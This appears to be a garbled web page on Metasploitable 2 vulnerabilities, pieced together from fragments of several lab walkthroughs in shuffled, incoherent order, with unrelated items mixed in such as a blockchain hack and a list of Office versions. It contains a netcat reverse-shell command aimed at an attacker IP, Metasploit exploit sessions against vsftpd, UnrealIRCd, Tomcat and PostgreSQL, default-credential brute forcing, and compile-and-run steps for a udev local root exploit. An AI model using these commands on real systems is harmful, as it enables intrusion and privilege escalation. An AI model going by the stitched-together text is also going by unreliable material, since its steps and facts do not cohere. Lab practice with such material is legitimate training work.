metasploitable 2 list of vulnerabilities

Getting access to a system with a writeable filesystem like this is trivial. echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] It is freely available and can be extended individually, which makes it very versatile and flexible. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' whoami Vulnerability Management Nexpose Lets go ahead. In Metasploit, an exploit is available for the vsftpd version. SMBUser no The username to authenticate as NetlinkPID no Usually udevd pid-1. If you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu is defaulting to using SSH. Metasploit is a free open-source tool for developing and executing exploit code. Every CVE Record added to the list is assigned and published by a CNA. gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Step 9: Display all the columns fields in the . Name Current Setting Required Description Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. Exploit target: Id Name From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner. Name Current Setting Required Description So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. . msf exploit(postgres_payload) > exploit Name Current Setting Required Description [*] Started reverse double handler VERBOSE false no Enable verbose output THREADS 1 yes The number of concurrent threads -- ---- now you can do some post exploitation. root, http://192.168.127.159:8080/oVUJAkfU/WAHKp.jar, Kali Linux VPN Options and Installation Walkthrough, Feroxbuster And Why It Is The Best Forced Browsing Attack Tool, How to Bypass Software Security Checks Through Reverse Engineering, Ethical Hacking Practice Test 6 Footprinting Fundamentals Level1, CEH Practice Test 5 Footprinting Fundamentals Level 0. [*] Writing to socket B The CVE List is built by CVE Numbering Authorities (CNAs). It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. In addition to these system-level accounts, the PostgreSQL service can be accessed with username postgres and password postgres, while the MySQL service is open to username root with an empty password. Id Name The advantage is that these commands are executed with the same privileges as the application. Login with the above credentials. RPORT 21 yes The target port payload => java/meterpreter/reverse_tcp The first of which installed on Metasploitable2 is distccd. Our Pentesting Lab will consist of Kali Linux as the attacker and Metasploitable 2 as the target. Differences between Metasploitable 3 and the older versions. It requires VirtualBox and additional software. Id Name So I'm going to exploit 7 different remote vulnerabilities , here are the list of vulnerabilities. Information about each OWASP vulnerability can be found under the menu on the left: For our first example we have Toggled Hints to 1 and selected the A1- Injection -> SQLi Bypass Authentication -> Login vulnerability: Trying the SSL Injection method of entering OR 1=1 into the Name field, as described in the hints, gave the following errors: This turns out to be due to a minor, yet crucial, configuration problem that impacts any database related functionality. Module options (exploit/linux/local/udev_netlink): Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. Metasploitable 2 is a straight-up download. [*] Accepted the second client connection This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. Proxies no Use a proxy chain STOP_ON_SUCCESS => true msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. Module options (exploit/multi/http/tomcat_mgr_deploy): Commands end with ; or \g. In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. msf exploit(postgres_payload) > show options Metasploitable Networking: The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact Attackers can implement arbitrary commands by defining a username that includes shell metacharacters. [*] Trying to mount writeable share 'tmp' [*] Trying to link 'rootfs' to the root filesystem [*] Now access the following share to browse the root filesystem: msf auxiliary(samba_symlink_traversal) > exit, root@ubuntu:~# smbclient //192.168.99.131/tmp, getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec). nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572 [*] Writing to socket B Name Current Setting Required Description This Command demonstrates the mount information for the NFS server. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 msf exploit(twiki_history) > exploit Least significant byte first in each pixel. So we got a low-privilege account. WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) ---- --------------- -------- ----------- Highlighted in red underline is the version of Metasploit. This is an issue many in infosec have to deal with all the time. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. RPORT 8180 yes The target port Id Name The main purpose of this vulnerable application is network testing. [*] Successfully sent exploit request You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. . We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . It aids the penetration testers in choosing and configuring of exploits. -- ---- USERNAME no The username to authenticate as Metasploitable 2 Among security researchers, Metasploitable 2 is the most commonly exploited online application. Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed. RHOSTS yes The target address range or CIDR identifier In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. To proceed, click the Next button. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host -- ---- LHOST => 192.168.127.159 Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. [*] Started reverse handler on 192.168.127.159:4444 To access the web applications, open a web browser and enter the URL http:// where is the IP address of Metasploitable 2. -- ---- -- ---- It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. whoami Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. Were 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. :14747:0:99999:7::: The Nessus scan that we ran against the target demonstrated the following: It is possible to access a remote database server without a password. TOMCAT_USER no The username to authenticate as RHOST 192.168.127.154 yes The target address [*] A is input msf exploit(vsftpd_234_backdoor) > show options I've done exploits from kali linux on metasploitable 2, and i want to fix the vulnerabilities i'm exploiting, but all i can find as a solution to these vulnerabilities is using firewalls or filtering ports. 17,011. [*] Reading from sockets This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). [*] Scanned 1 of 1 hosts (100% complete) RHOST yes The target address VHOST no HTTP server virtual host Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. Name Current Setting Required Description It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints as it brings up a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint. [*] Accepted the second client connection Backdoors - A few programs and services have been backdoored. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 RPORT 5432 yes The target port [*] Matching This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink RHOST => 192.168.127.154 RHOSTS => 192.168.127.154 USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line Module options (exploit/linux/misc/drb_remote_codeexec): [*] Started reverse double handler Name Current Setting Required Description RHOST yes The target address Within Metasploitable edit the following file via command: Next change the following line then save the file: In Kali Linux bring up the Mutillidae web application in the browser as before and click the Reset DB button to re-initialize the database. msf exploit(distcc_exec) > set RHOST 192.168.127.154 First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. msf exploit(tomcat_mgr_deploy) > show option Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(tomcat_mgr_deploy) > set RPORT 8180 Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. Step 1: Setup DVWA for SQL Injection. msf exploit(udev_netlink) > exploit [*] A is input Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. -- ---- Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. [*] Automatically selected target "Linux x86" There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. msf exploit(udev_netlink) > set SESSION 1 First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search